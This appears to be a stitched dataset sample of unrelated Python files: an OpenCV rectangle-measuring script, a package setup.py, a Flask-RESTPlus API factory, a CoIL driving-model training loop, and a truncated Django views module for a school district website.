            # calculate area
            area = cv2.contourArea(approx)
            cv2.drawContours(frame, [approx], 0, (0, 0, 255), 1)
            if (area >= 1000):
                cv2.drawContours(frame, [approx], 0, (255, 0, 0), 2)
                # Diagonals of a rectangle are (nearly) equal.
                difference = abs(round(cv2.norm(approx[0], approx[2]) - cv2.norm(approx[1], approx[3])))
                if (difference < 30):
                    # use [c] insted [approx] for precise detection line
                    # c = c.astype("float")
                    # c *= ratio
                    # c = c.astype("int")
                    # cv2.drawContours(image, [c], 0, (0, 255, 0), 3)
                    # (x, y, w, h) = cv2.boundingRect(approx)
                    # ar = w / float(h)
                    # draw detected object
                    cv2.drawContours(frame, [approx], 0, (0, 255, 0), 3)
                    # draw detected data
                    M = cv2.moments(c)
                    if (M["m00"] != 0):
                        cX = int((M["m10"] / M["m00"]))
                        cY = int((M["m01"] / M["m00"]))
                        # a square will have an aspect ratio that is approximately
                        # equal to one, otherwise, the shape is a rectangle
                        # shape = "square" if ar >= 0.95 and ar <= 1.05 else "rectangle"
                        (x, y, w, h) = cv2.boundingRect(approx)
                        ar = w / float(h)
                        # calculate width and height
                        width = w * mmRatio
                        height = h * mmRatio
                        messurment = '%0.2fmm * %0.2fmm | %s' % (width, height, difference)
                        # draw text
                        cv2.putText(frame, messurment, (approx[0][0][0], approx[0][0][1]),
                                    cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 0, 255), 2)
    liveFrame = cv2.cvtColor(liveFrame, cv2.COLOR_GRAY2BGR)
    # Stack edge view above annotated view for side-by-side inspection.
    combined = np.vstack((liveFrame, frame))
    height, width = combined.shape[:2]
    return cv2.resize(combined, (int(width/scale), int(height/scale)))


playvideo()
python
import os from setuptools import setup, find_packages import lendingblock def read(name): filename = os.path.join(os.path.dirname(__file__), name) with open(filename) as fp: return fp.read() meta = dict( version=lendingblock.__version__, description=lendingblock.__doc__, name='lb-py', author='Luca Sbardella', author_email="luca@lendingblock.com", maintainer_email="luca@lendingblock.com", url="https://github.com/lendingblock/lb-py", license="BSD", long_description=read('readme.md'), packages=find_packages(exclude=['tests', 'tests.*']), include_package_data=True, zip_safe=False, install_requires=['aiohttp'], classifiers=[ 'Development Status :: 3 - Alpha', 'Intended Audience :: Developers', 'License :: OSI Approved :: BSD License', 'Operating System :: OS Independent', 'Programming Language :: JavaScript', 'Programming Language :: Python', 'Programming Language :: Python :: 3', 'Programming Language :: Python :: 3.6', 'Topic :: Utilities' ] ) if __name__ == '__main__': setup(**meta)
nilq/baby-python
python
# pylint: disable=import-error from importlib import import_module from flask_restplus import Api # pylint: disable=no-name-in-module from utils.configmanager import ConfigManager from app import resources def make_api(api_config): api = Api( prefix=api_config["prefix"], title=api_config["title"], version=api_config["version"], catch_all_404s=True, ) for module_name in api_config["resources"]: module = import_module("." + module_name, "app.resources") namespace = getattr(module, "api") api.add_namespace(namespace) return api
nilq/baby-python
python
import os
import sys
import random
import time
import traceback

import torch
import torch.optim as optim

from configs import g_conf, set_type_of_process, merge_with_yaml
from network import CoILModel, Loss, adjust_learning_rate_auto
from input import CoILDataset, Augmenter, select_balancing_strategy
from logger import coil_logger
from coilutils.checkpoint_schedule import is_ready_to_save, get_latest_saved_checkpoint, \
    check_loss_validation_stopped


# The main function maybe we could call it with a default name
def execute(gpu, exp_batch, exp_alias, suppress_output=True, number_of_workers=12):
    """
    The main training function. This function loads the latest checkpoint
    for a given exp_batch (folder) and exp_alias (experiment configuration).
    With this checkpoint it starts from the beginning or continues some training.

    Args:
        gpu: The GPU number (assigned to CUDA_VISIBLE_DEVICES, so it must be a string
             or convertible to one — TODO confirm callers pass a string)
        exp_batch: the folder with the experiments
        exp_alias: the alias, experiment name
        suppress_output: if the output is going to be redirected to files under _output_logs
        number_of_workers: the number of threads used for data loading

    Returns:
        None

    """
    try:
        # We set the visible cuda devices to select the GPU
        os.environ["CUDA_VISIBLE_DEVICES"] = gpu
        # Reset variable weights before the yaml merge fills them in.
        g_conf.VARIABLE_WEIGHT = {}
        # At this point the log file with the correct naming is created.
        # You merge the yaml file with the global configuration structure.
        merge_with_yaml(os.path.join('configs', exp_batch, exp_alias + '.yaml'))
        set_type_of_process('train')
        # Set the process into loading status.
        coil_logger.add_message('Loading', {'GPU': gpu})

        # Put the output to a separate file if it is the case.
        # NOTE: stdout/stderr are opened in append mode, line-buffered, and are
        # never restored — this process is expected to be a dedicated worker.
        if suppress_output:
            if not os.path.exists('_output_logs'):
                os.mkdir('_output_logs')
            sys.stdout = open(os.path.join('_output_logs', exp_alias + '_' +
                              g_conf.PROCESS_NAME + '_' + str(os.getpid()) + ".out"), "a",
                              buffering=1)
            sys.stderr = open(os.path.join('_output_logs',
                              exp_alias + '_err_'+g_conf.PROCESS_NAME + '_'
                              + str(os.getpid()) + ".out"),
                              "a", buffering=1)

        # Preload option: load a checkpoint from a *different* experiment as a
        # warm start. If a checkpoint of THIS experiment also exists below, it
        # overwrites this one (resume takes precedence over preload).
        if g_conf.PRELOAD_MODEL_ALIAS is not None:
            checkpoint = torch.load(os.path.join('_logs', g_conf.PRELOAD_MODEL_BATCH,
                                                 g_conf.PRELOAD_MODEL_ALIAS,
                                                 'checkpoints',
                                                 str(g_conf.PRELOAD_MODEL_CHECKPOINT)+'.pth'))

        # Get the latest checkpoint to be loaded.
        # Returns None if there are no checkpoints saved for this model.
        checkpoint_file = get_latest_saved_checkpoint()
        if checkpoint_file is not None:
            checkpoint = torch.load(os.path.join('_logs', exp_batch, exp_alias,
                                    'checkpoints', str(get_latest_saved_checkpoint())))
            iteration = checkpoint['iteration']
            best_loss = checkpoint['best_loss']
            best_loss_iter = checkpoint['best_loss_iter']
        else:
            # Fresh run: start counting from zero with a sentinel "worst" loss.
            iteration = 0
            best_loss = 10000.0
            best_loss_iter = 0

        # Define the dataset. This structure has the __get_item__ redefined in a way
        # that you can access the positions from the root directory as in a vector.
        full_dataset = os.path.join(os.environ["COIL_DATASET_PATH"], g_conf.TRAIN_DATASET_NAME)

        # By instantiating the augmenter we get a callable that augments images and
        # transforms them into tensors.
        augmenter = Augmenter(g_conf.AUGMENTATION)

        # Instantiate the class used to read a dataset. The coil dataset generator
        # can be found in the `input` package.
        dataset = CoILDataset(full_dataset, transform=augmenter,
                              preload_name=str(g_conf.NUMBER_OF_HOURS) + 'hours_' + g_conf.TRAIN_DATASET_NAME)
        print ("Loaded dataset")

        # The balancing strategy yields an (infinite or epoch-based — confirm in
        # `input.select_balancing_strategy`) iterable of training batches.
        data_loader = select_balancing_strategy(dataset, iteration, number_of_workers)
        model = CoILModel(g_conf.MODEL_TYPE, g_conf.MODEL_CONFIGURATION)
        model.cuda()
        optimizer = optim.Adam(model.parameters(), lr=g_conf.LEARNING_RATE)

        # Restore network/optimizer state when resuming (or warm-starting).
        if checkpoint_file is not None or g_conf.PRELOAD_MODEL_ALIAS is not None:
            model.load_state_dict(checkpoint['state_dict'])
            optimizer.load_state_dict(checkpoint['optimizer'])
            accumulated_time = checkpoint['total_time']
            loss_window = coil_logger.recover_loss_window('train', iteration)
        else:
            # We accumulate iteration time and keep the average speed.
            accumulated_time = 0
            loss_window = []

        print ("Before the loss")

        criterion = Loss(g_conf.LOSS_FUNCTION)

        # Loss time series window
        for data in data_loader:

            # Basically in this mode of execution, we validate every X steps; if the
            # validation loss goes up 3 times, a stop marker is added to the _logs
            # folder, which is read here to terminate training early.
            if g_conf.FINISH_ON_VALIDATION_STALE is not None and \
                    check_loss_validation_stopped(iteration, g_conf.FINISH_ON_VALIDATION_STALE):
                break

            """
                ####################################
                    Main optimization loop
                ####################################
            """

            iteration += 1
            # Learning-rate schedule driven by the recent loss history.
            if iteration % 1000 == 0:
                adjust_learning_rate_auto(optimizer, loss_window)

            # get the control commands from float_data, size = [120,1]
            capture_time = time.time()
            controls = data['directions']
            # The output (branches) is a list of 5 branch results, each branch is of size [120,3]
            model.zero_grad()
            branches = model(torch.squeeze(data['rgb'].cuda()),
                             dataset.extract_inputs(data).cuda())
            loss_function_params = {
                'branches': branches,
                'targets': dataset.extract_targets(data).cuda(),
                'controls': controls.cuda(),
                'inputs': dataset.extract_inputs(data).cuda(),
                'branch_weights': g_conf.BRANCH_LOSS_WEIGHT,
                'variable_weights': g_conf.VARIABLE_WEIGHT
            }
            loss, _ = criterion(loss_function_params)
            loss.backward()
            optimizer.step()

            """
                ####################################
                    Saving the model if necessary
                ####################################
            """

            if is_ready_to_save(iteration):

                state = {
                    'iteration': iteration,
                    'state_dict': model.state_dict(),
                    'best_loss': best_loss,
                    'total_time': accumulated_time,
                    'optimizer': optimizer.state_dict(),
                    'best_loss_iter': best_loss_iter
                }
                torch.save(state, os.path.join('_logs', exp_batch, exp_alias
                                               , 'checkpoints', str(iteration) + '.pth'))

            """
                ################################################
                    Adding tensorboard logs.
                    Making calculations for logging purposes.
                    These logs are monitored by the printer module.
                #################################################
            """
            coil_logger.add_scalar('Loss', loss.data, iteration)
            coil_logger.add_image('Image', torch.squeeze(data['rgb']), iteration)
            # Track the best (lowest) loss seen so far and when it occurred.
            if loss.data < best_loss:
                best_loss = loss.data.tolist()
                best_loss_iter = iteration

            # Log a random position from the batch.
            # NOTE(review): len(data) is the number of keys in the batch dict, not
            # the batch size — confirm this index range is intended.
            position = random.randint(0, len(data) - 1)

            output = model.extract_branch(torch.stack(branches[0:4]), controls)
            error = torch.abs(output - dataset.extract_targets(data).cuda())

            accumulated_time += time.time() - capture_time

            coil_logger.add_message('Iterating',
                                    {'Iteration': iteration,
                                     'Loss': loss.data.tolist(),
                                     'Images/s': (iteration * g_conf.BATCH_SIZE) / accumulated_time,
                                     'BestLoss': best_loss, 'BestLossIteration': best_loss_iter,
                                     'Output': output[position].data.tolist(),
                                     'GroundTruth': dataset.extract_targets(data)[
                                         position].data.tolist(),
                                     'Error': error[position].data.tolist(),
                                     'Inputs': dataset.extract_inputs(data)[
                                         position].data.tolist()},
                                    iteration)
            loss_window.append(loss.data.tolist())
            coil_logger.write_on_error_csv('train', loss.data)
            print("Iteration: %d Loss: %f" % (iteration, loss.data))

        coil_logger.add_message('Finished', {})

    except KeyboardInterrupt:
        coil_logger.add_message('Error', {'Message': 'Killed By User'})

    except RuntimeError as e:
        # Typical causes: CUDA OOM or shape mismatches; record the message so the
        # experiment status monitor can show why this worker stopped.
        coil_logger.add_message('Error', {'Message': str(e)})

    except:
        # Broad catch-all: log the traceback and mark the experiment as failed so
        # unexpected errors don't vanish into the redirected output files.
        traceback.print_exc()
        coil_logger.add_message('Error', {'Message': 'Something Happened'})
nilq/baby-python
python
import json import urllib.request from urllib.error import URLError from django.shortcuts import render, get_object_or_404, redirect from django.core.cache import cache from django.http import HttpResponse, Http404 from django.template import Context, Template, RequestContext from django.db.models import Q, Prefetch, Count, OuterRef from django.utils import timezone from django.contrib import messages from django.apps import apps from django.http import HttpResponse from collections import OrderedDict import apps.common.functions as commonfunctions from apps.objects.models import Node, User from .models import Page, School, Department, Board, BoardSubPage, News, NewsYear, SubPage, BoardMeetingYear, DistrictCalendarYear,SuperintendentMessage,SuperintendentMessageYear, Announcement from apps.taxonomy.models import Location, City, State, Zipcode, Language, BoardPrecinct, BoardPolicySection, SchoolType, SchoolOption, SchoolAdministratorType, SubjectGradeLevel from apps.images.models import Thumbnail, NewsThumbnail, ContentBanner, ProfilePicture, DistrictLogo from apps.directoryentries.models import ( Staff, SchoolAdministrator, Administrator, BoardMember, StudentBoardMember, BoardPolicyAdmin, SchoolAdministration, SchoolStaff, SchoolFaculty, SchoolCommunityCouncilMember, ) from apps.links.models import ResourceLink, ActionButton, ClassWebsite from apps.documents.models import ( Document, BoardPolicy, Policy, AdministrativeProcedure, SupportingDocument, DisclosureDocument, SchoolCommunityCouncilMeetingAgenda, SchoolCommunityCouncilMeetingMinutes, ) from apps.files.models import File, AudioFile, VideoFile from apps.events.models import BoardMeeting, DistrictCalendarEvent, SchoolCommunityCouncilMeeting from apps.users.models import Employee from apps.contactmessages.forms import ContactMessageForm def updates_school_reg_dates(): reg_locations = { 10: 'Online', 20: 'Online/On-Site', 30: 'On-Site', } reg_audience = { 105: '1 - 5th Grade', 6: '6th Grade', 7: '7th Grade', 8: 
'8th Grade', 9: '9th Grade', 199: 'All Students', 99: 'All Unregistered Students', 0: 'Kindergarten', 13: 'New Students', 21: 'Returning Students', } try: response = urllib.request.urlopen('https://apex.slcschools.org/apex/slcsd-apps/regcalendars/') except URLError: return jsonalldates = response.read() alldates = json.loads(jsonalldates.decode("utf-8")) groupeddates = {} for date in alldates['items']: if date['location'] in reg_locations: date['location'] = reg_locations[date['location']] if date['audience'] in reg_audience: date['audience'] = reg_audience[date['audience']] if date['school'] not in groupeddates: groupeddates[date['school']] = [] groupeddates[date['school']].append(date) return groupeddates def set_template(request, node): if request.site.domain == 'www.slcschools.org': if request.path == '/' or request.path == '/home/': return 'cmstemplates/{0}/pagelayouts/{1}'.format( request.site.dashboard_general_site.template.namespace, 'home.html', ) if request.path == '/employees/': return 'cmstemplates/{0}/pagelayouts/{1}'.format( request.site.dashboard_general_site.template.namespace, 'page-wide.html', ) if request.path == '/schools/school-handbooks/': return 'cmstemplates/{0}/pagelayouts/{1}'.format( request.site.dashboard_general_site.template.namespace, 'page-wide.html', ) if request.path == '/schools/district-demographics/': return 'cmstemplates/{0}/pagelayouts/{1}'.format( request.site.dashboard_general_site.template.namespace, 'page-wide.html', ) if request.path == '/search/': return 'cmstemplates/{0}/pagelayouts/{1}'.format( request.site.dashboard_general_site.template.namespace, 'page-wide.html', ) if request.path == '/departments/department-structure/': return 'cmstemplates/www_slcschools_org/pagelayouts/departmentstructure.html' if request.path == '/departments/superintendents-office/downloads/': return 'cmstemplates/{0}/pagelayouts/{1}'.format( request.site.dashboard_general_site.template.namespace, 'page-wide.html', ) if request.path == 
'/calendars/guidelines-for-developing-calendar-options/': return 'cmstemplates/{0}/pagelayouts/{1}'.format( request.site.dashboard_general_site.template.namespace, 'page-wide.html', ) if node.content_type == 'board' or node.content_type == 'boardsubpage': return 'cmstemplates/www_slcschools_org/pagelayouts/boarddetail.html' if node.content_type == 'newsyear': return 'cmstemplates/www_slcschools_org/pagelayouts/newsyeararchive.html' if node.content_type == 'news': return 'cmstemplates/www_slcschools_org/pagelayouts/articledetail.html' if request.path == '/schools/': return 'cmstemplates/www_slcschools_org/pagelayouts/main-school-directory.html' if request.path == '/schools/elementary-schools/': return 'cmstemplates/www_slcschools_org/pagelayouts/school-directory.html' if request.path == '/schools/k-8-schools/': return 'cmstemplates/www_slcschools_org/pagelayouts/school-directory.html' if request.path == '/schools/middle-schools/': return 'cmstemplates/www_slcschools_org/pagelayouts/school-directory.html' if request.path == '/schools/high-schools/': return 'cmstemplates/www_slcschools_org/pagelayouts/school-directory.html' if request.path == '/schools/charter-schools/': return 'cmstemplates/www_slcschools_org/pagelayouts/school-directory.html' if request.path == '/schools/community-learning-centers/': return 'cmstemplates/www_slcschools_org/pagelayouts/school-directory.html' if node.content_type == 'school': return 'cmstemplates/www_slcschools_org/pagelayouts/schooldetail.html' if request.path == '/departments/': return 'cmstemplates/www_slcschools_org/pagelayouts/department-directory.html' if node.content_type == 'superintendentmessageyear': return 'cmstemplates/www_slcschools_org/pagelayouts/supermessageyeararchive.html' if node.content_type == 'department': return 'cmstemplates/www_slcschools_org/pagelayouts/departmentdetail.html' if node.content_type == 'superintendentmessage': return 'cmstemplates/www_slcschools_org/pagelayouts/supermessagedetail.html' if 
request.path == '/directory/': return 'cmstemplates/www_slcschools_org/pagelayouts/directory.html' if request.path.startswith('/directory/last-name-'): return 'cmstemplates/www_slcschools_org/pagelayouts/directory-letter.html' if node.content_type == 'districtcalendaryear': return 'cmstemplates/www_slcschools_org/pagelayouts/districtcalendaryears.html' if node.content_type == 'boardmeetingyear': return 'cmstemplates/www_slcschools_org/pagelayouts/boardmeetingyears.html' if request.path == '/contact-us/': return 'cmstemplates/www_slcschools_org/pagelayouts/contact-us.html' if request.path == '/contact-us/inline/': return 'cmstemplates/www_slcschools_org/blocks/contact-us-inline.html' if request.path == '/schools/school-registration-dates/': return 'cmstemplates/www_slcschools_org/pagelayouts/school-registration-dates.html' if node.node_type == 'documents': if node.content_type == 'document': return 'cmstemplates/www_slcschools_org/pagelayouts/document.html' if node.content_type == 'policy': return 'cmstemplates/www_slcschools_org/pagelayouts/document.html' if node.content_type == 'administrativeprocedure': return 'cmstemplates/www_slcschools_org/pagelayouts/document.html' if node.content_type == 'supportingdocument': return 'cmstemplates/www_slcschools_org/pagelayouts/document.html' if node.content_type == 'boardmeetingagenda': return 'cmstemplates/www_slcschools_org/pagelayouts/document.html' if node.content_type == 'boardmeetingminutes': return 'cmstemplates/www_slcschools_org/pagelayouts/document.html' if node.content_type == 'boardmeetingaudio': return 'cmstemplates/www_slcschools_org/pagelayouts/audio.html' if node.content_type == 'boardmeetingvideo': return 'cmstemplates/www_slcschools_org/pagelayouts/video.html' return 'cmstemplates/{0}/pagelayouts/{1}'.format( request.site.dashboard_general_site.template.namespace, 'page.html', ) else: return 'cmstemplates/{0}/pagelayouts/{1}'.format( request.site.dashboard_general_site.template.namespace, 
node.pagelayout.namespace, ) def redirect_request(request): currentyear = commonfunctions.currentyear() if request.path == '/board-of-education/board-meetings/': try: year = BoardMeetingYear.objects.get(title=currentyear['currentyear']['long'], site=request.site) except BoardMeetingYear.DoesNotExist: meeting, created = BoardMeeting.objects.get_or_create(startdate=timezone.now(), site=request.site) if created: meeting.save() meeting.delete() meeting.delete() year = BoardMeetingYear.objects.get(title=currentyear['currentyear']['long'], site=request.site) return redirect(year.url) if request.path == '/calendars/' and request.site.domain == 'www.slcschools.org': try: year = DistrictCalendarYear.objects.get(title=currentyear['currentyear']['long'], site=request.site) except DistrictCalendarYear.DoesNotExist: event, created = DistrictCalendarEvent.objects.get_or_create(startdate=timezone.now(), site=request.site) if created: event.save() event.delete() event.delete() year = DistrictCalendarYear.objects.get(title=currentyear['currentyear']['long'], site=request.site) return redirect(year.url) if request.path == '/news/': try: year = NewsYear.objects.get(title=currentyear['currentyear']['long'], site=request.site) except NewsYear.DoesNotExist: news, created = News.objects.get_or_create(title='tempnews', site=request.site) if created: news.save() news.delete() news.delete() year = NewsYear.objects.get(title=currentyear['currentyear']['long'], site=request.site) return redirect(year.url) if request.path == '/departments/superintendents-office/superintendents-message/': try: year = SuperintendentMessageYear.objects.get(title=currentyear['currentyear']['long'], site=request.site) except SuperintendentMessageYear.DoesNotExist: message, created = SuperintendentMessage.objects.get_or_create(author_date=timezone.now(), site=request.site) if created: message.save() message.delete() message.delete() year = 
SuperintendentMessageYear.objects.get(title=currentyear['currentyear']['long'], site=request.site) return redirect(year.url) return None def prefetch_building_location_detail(qs): prefetchqs = ( Location .objects .filter(deleted=0) .filter(published=1) .only( 'street_address', 'location_city', 'location_state', 'location_zipcode', 'google_place', ) .prefetch_related( Prefetch( 'location_city', queryset=( City .objects .filter(deleted=0) .filter(published=1) .only('title') ) ), Prefetch( 'location_state', queryset=( State .objects .filter(deleted=0) .filter(published=1) .only('title') ) ), Prefetch( 'location_zipcode', queryset=( Zipcode .objects .filter(deleted=0) .filter(published=1) .only('title') ) ) ) ) return qs.prefetch_related( Prefetch( 'building_location', queryset=prefetchqs, ) ) def prefetch_boardmembers_detail(qs): prefetchqs = ( BoardMember .objects .filter(deleted=0) .filter(published=1) .filter(employee__is_active=True) .filter(employee__is_staff=True) .order_by('precinct__title') .only( 'employee', 'is_president', 'is_vicepresident', 'precinct', 'phone', 'street_address', 'city', 'state', 'zipcode', 'term_ends', 'related_node', ) .prefetch_related( Prefetch( 'employee', queryset=( Employee .objects .filter(is_active=1) .filter(is_staff=1) .only( 'last_name', 'first_name', 'email', ) .prefetch_related( Prefetch( 'images_profilepicture_node', ProfilePicture.objects .filter(deleted=0) .filter(published=1) .only( 'image_file', 'alttext', 'related_node_id', ) ) ) ) ), Prefetch( 'precinct', queryset=( BoardPrecinct .objects .filter(deleted=0) .filter(published=1) .only( 'pk', 'title', ) .prefetch_related('files_precinctmap_node') .order_by('title') ) ), Prefetch( 'city', queryset=( City .objects .filter(deleted=0) .filter(published=1) .only( 'pk', 'title', ) ) ), Prefetch( 'state', queryset=( State .objects .filter(deleted=0) .filter(published=1) .only( 'pk', 'title', ) ) ), Prefetch( 'zipcode', queryset=( Zipcode .objects .filter(deleted=0) 
.filter(published=1) .only( 'pk', 'title', ) ) ) ) ) return qs.prefetch_related( Prefetch( 'directoryentries_boardmember_node', queryset=prefetchqs, ) ) def prefetch_studentboardmember_detail(qs): prefetchqs = ( StudentBoardMember .objects .filter(deleted=0) .filter(published=1) .order_by('title') .only( 'first_name', 'last_name', 'phone', 'building_location', 'related_node', ) .prefetch_related( Prefetch( 'building_location', queryset=( Location .objects .filter(deleted=0) .filter(published=1) .only( 'street_address', 'location_city', 'location_state', 'location_zipcode', 'google_place', ) .prefetch_related( Prefetch( 'location_city', queryset=( City .objects .filter(deleted=0) .filter(published=1) .only('title') ) ), Prefetch( 'location_state', queryset=( State .objects .filter(deleted=0) .filter(published=1) .only('title') ) ), Prefetch( 'location_zipcode', queryset=( Zipcode .objects .filter(deleted=0) .filter(published=1) .only('title') ) ) ) ) ), Prefetch( 'images_profilepicture_node', queryset=( ProfilePicture .objects .filter(deleted=0) .filter(published=1) .only( 'image_file', 'alttext', 'related_node_id', ) ) ) ) ) return qs.prefetch_related( Prefetch( 'directoryentries_studentboardmember_node', queryset=prefetchqs, ) ) def prefetch_schooladministrators_detail(qs): prefetchqs = (SchoolAdministrator .objects .filter(deleted=False) .filter(published=True) .filter(employee__is_active=True) .filter(employee__is_staff=True) .order_by('inline_order') .only( 'pk', 'employee', 'schooladministratortype', 'inline_order', 'related_node', ) .prefetch_related( Prefetch( 'employee', queryset=( Employee .objects .filter(is_active=True) .filter(is_staff=True) .only( 'pk', 'last_name', 'first_name', 'email', 'job_title', ) .prefetch_related( Prefetch( 'images_profilepicture_node', queryset=( ProfilePicture .objects .filter(deleted=0) .filter(published=1) .only( 'pk', 'title', 'image_file', 'alttext', 'related_node', ) ), ) ) ), ), ) .prefetch_related( Prefetch( 
'schooladministratortype', queryset=( SchoolAdministratorType .objects .filter(deleted=False) .filter(published=True) .only( 'pk', 'title', ) ), ), ) ) return qs.prefetch_related( Prefetch( 'directoryentries_schooladministrator_node', queryset=prefetchqs, ) ) def prefetch_administrators_detail(qs): prefetchqs = ( Administrator .objects .filter(deleted=False) .filter(published=True) .filter(employee__is_active=True) .filter(employee__is_staff=True) .order_by('inline_order') .only( 'pk', 'employee', 'job_title', 'inline_order', 'related_node', ) .prefetch_related( Prefetch( 'employee', queryset=( Employee .objects .filter(is_active=True) .filter(is_staff=True) .only( 'pk', 'last_name', 'first_name', 'email', 'job_title', ) .prefetch_related( Prefetch( 'images_profilepicture_node', queryset=( ProfilePicture .objects .filter(deleted=0) .filter(published=1) .only( 'pk', 'title', 'image_file', 'alttext', 'related_node', ) ) ) ) ) ) ) ) return qs.prefetch_related( Prefetch( 'directoryentries_administrator_node', queryset=prefetchqs, ) ) def prefetch_staff_detail(qs): prefetchqs = ( Staff .objects .filter(deleted=False) .filter(published=True) .filter(employee__is_active=True) .filter(employee__is_staff=True) .order_by('inline_order') .only( 'pk', 'employee', 'job_title', 'inline_order', 'related_node', ) .prefetch_related( Prefetch( 'employee', queryset=( Employee .objects .filter(is_active=True) .filter(is_staff=True) .only( 'pk', 'last_name', 'first_name', 'email', 'job_title', ) ) ) ) ) return qs.prefetch_related( Prefetch( 'directoryentries_staff_node', queryset=prefetchqs, ) ) def prefetch_documents_detail(qs): prefetchqs = ( Document .objects .filter(deleted=0) .filter(published=1) .order_by('inline_order') .only( 'pk', 'title', 'inline_order', 'related_node' ) .prefetch_related( Prefetch( 'files_file_node', queryset=( File .objects .filter(deleted=0) .filter(published=1) .order_by( 'file_language__lft', 'file_language__title', ) .only( 'title', 'file_file', 
'file_language', 'related_node', ) .prefetch_related( Prefetch( 'file_language', queryset=( Language .objects .filter(deleted=0) .filter(published=1) .only('title') ) ) ) ) ) ) ) return qs.prefetch_related( Prefetch( 'documents_document_node', queryset=prefetchqs, ) ) def prefetch_disclosuredocuments_detail(qs): prefetchqs = ( DisclosureDocument .objects .filter(deleted=0) .filter(published=1) .annotate( file_count=Count( 'files_file_node', filter=Q( files_file_node__published=1, files_file_node__deleted=0, ) ) ) .filter(file_count__gt=0) .order_by('inline_order') .only( 'pk', 'title', 'inline_order', 'related_node' ) .prefetch_related( Prefetch( 'files_file_node', queryset=( File .objects .filter(deleted=0) .filter(published=1) .order_by( 'file_language__lft', 'file_language__title', ) .only( 'title', 'file_file', 'file_language', 'related_node', ) .prefetch_related( Prefetch( 'file_language', queryset=( Language .objects .filter(deleted=0) .filter(published=1) .only('title') ) ) ) ) ) ) ) return qs.prefetch_related( Prefetch( 'documents_disclosuredocument_node', queryset=prefetchqs, ) ) def prefetch_schoolcommunitycouncilmembers_detail(qs): prefetchqs = ( SchoolCommunityCouncilMember .objects .filter(deleted=0) .filter(published=1) .order_by('inline_order') ) qs = qs.prefetch_related( Prefetch( 'directoryentries_schoolcommunitycouncilmember_node', queryset=prefetchqs, ) ) return qs def prefetch_schoolcommunitycouncilmeetings_detail(qs): prefetchqs = ( SchoolCommunityCouncilMeeting .objects .filter(deleted=0) .filter(published=1) .order_by('startdate') ) prefetchqs = prefetch_schoolcommunitycouncilmeetingagenda_detail(prefetchqs) prefetchqs = prefetch_schoolcommunitycouncilmeetingminutes_detail(prefetchqs) qs = qs.prefetch_related( Prefetch( 'events_schoolcommunitycouncilmeeting_node', queryset=prefetchqs, ) ) return qs def prefetch_schoolcommunitycouncilmeetingagenda_detail(qs): prefetchqs = ( SchoolCommunityCouncilMeetingAgenda .objects .filter(deleted=0) 
.filter(published=1) .annotate( file_count=Count( 'files_file_node', filter=Q( files_file_node__published=1, files_file_node__deleted=0, ) ) ) .filter(file_count__gt=0) .order_by('inline_order') .only( 'pk', 'title', 'inline_order', 'related_node' ) .prefetch_related( Prefetch( 'files_file_node', queryset=( File .objects .filter(deleted=0) .filter(published=1) .order_by( 'file_language__lft', 'file_language__title', ) .only( 'title', 'file_file', 'file_language', 'related_node', ) .prefetch_related( Prefetch( 'file_language', queryset=( Language .objects .filter(deleted=0) .filter(published=1) .only('title') ) ) ) ) ) ) ) qs = qs.prefetch_related( Prefetch( 'documents_schoolcommunitycouncilmeetingagenda_node', queryset=prefetchqs, ) ) return qs def prefetch_schoolcommunitycouncilmeetingminutes_detail(qs): prefetchqs = ( SchoolCommunityCouncilMeetingMinutes .objects .filter(deleted=0) .filter(published=1) .annotate( file_count=Count( 'files_file_node', filter=Q( files_file_node__published=1, files_file_node__deleted=0, ) ) ) .filter(file_count__gt=0) .order_by('inline_order') .only( 'pk', 'title', 'inline_order', 'related_node' ) .prefetch_related( Prefetch( 'files_file_node', queryset=( File .objects .filter(deleted=0) .filter(published=1) .order_by( 'file_language__lft', 'file_language__title', ) .only( 'title', 'file_file', 'file_language', 'related_node', ) .prefetch_related( Prefetch( 'file_language', queryset=( Language .objects .filter(deleted=0) .filter(published=1) .only('title') ) ) ) ) ) ) ) qs = qs.prefetch_related( Prefetch( 'documents_schoolcommunitycouncilmeetingminutes_node', queryset=prefetchqs, ) ) return qs def prefetch_contentbanner_detail(qs): prefetchqs = ( ContentBanner .objects .filter(deleted=0) .filter(published=1) .only( 'image_file', 'alttext', 'related_node_id', ) .order_by('inline_order') ) return qs.prefetch_related( Prefetch( 'images_contentbanner_node', queryset=prefetchqs, ) ) def prefetch_actionbuttons_detail(qs): prefetchqs = ( 
ActionButton .objects .filter(deleted=0) .filter(published=1) .only( 'pk', 'title', 'link_url', 'inline_order', 'related_node', ) .order_by('inline_order') ) return qs.prefetch_related( Prefetch( 'links_actionbutton_node', queryset=prefetchqs, ) ) def prefetch_resourcelinks_detail(qs): prefetchqs = ( ResourceLink .objects .filter(deleted=0) .filter(published=1) .only( 'pk', 'title', 'link_url', 'inline_order', 'related_node', ) .order_by('inline_order') ) return qs.prefetch_related( Prefetch( 'links_resourcelink_node', queryset=prefetchqs, ) ) def prefetch_classwebsite_detail(qs): prefetchqs = ( ClassWebsite .objects .filter(deleted=0) .filter(published=1) .only( 'pk', 'title', 'link_url', 'inline_order', 'related_node', ) ) return qs.prefetch_related( Prefetch( 'links_classwebsite_node', queryset=prefetchqs, ) ) def prefetch_announcement_detail(qs): prefetchqs = ( Announcement .objects .filter(deleted=0) .filter(published=1) .order_by('inline_order') ) return qs.prefetch_related( Prefetch( 'pages_announcement_node', queryset=prefetchqs, ) ) def prefetch_subjectgradelevel_detail(qs): activesubjects = [] page = qs[0] for person in page.directoryentries_schoolfaculty_node.all(): if person.primary_subject.pk not in activesubjects: activesubjects.append(person.primary_subject.pk) prefetchqs = ( SubjectGradeLevel .objects .filter(deleted=0) .filter(published=1) .filter(pk__in=activesubjects) .order_by('inline_order') ) return qs.prefetch_related( Prefetch( 'taxonomy_subjectgradelevel_node', queryset=prefetchqs, ) ) def prefetch_schooladministration_detail(qs): prefetchqs = ( SchoolAdministration .objects .filter(deleted=0) .filter(published=1) .filter(employee__is_active=True) .filter(employee__is_staff=True) .order_by('inline_order') .prefetch_related( Prefetch( 'employee', queryset=( Employee .objects .filter(is_active=True) .filter(is_staff=True) .only( 'pk', 'last_name', 'first_name', 'email', 'job_title', ) ) ) ) ) return qs.prefetch_related( Prefetch( 
